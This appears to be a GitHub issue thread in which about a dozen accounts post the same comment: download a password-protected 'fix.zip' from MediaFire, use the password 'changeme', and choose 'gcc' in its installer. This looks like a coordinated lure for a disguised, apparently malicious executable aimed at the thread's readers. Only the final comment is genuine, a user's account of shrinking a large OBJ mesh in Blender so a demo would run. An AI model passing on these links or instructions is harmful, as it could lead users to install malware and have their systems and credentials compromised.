https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mesilver1218** [comment]
The issue was due to the **.obj** dataset, where the mesh was overly detailed, resulting in a file size of nearly 178MB. To resolve this, I downsampled the mesh in Blender using a 10% decimation, reducing the OBJ file size to 16.4MB. When monitoring GPU usage with `watch -d -n 0.3 nvidia-smi`, I observed that up to 8GB of memory was being utilized. After these adjustments, I successfully ran `run_demo.py`. For anyone else looking to use a custom dataset in a similar way, I hope this information is helpful. Lastly, many thanks to the repository maintainers for their hard work!
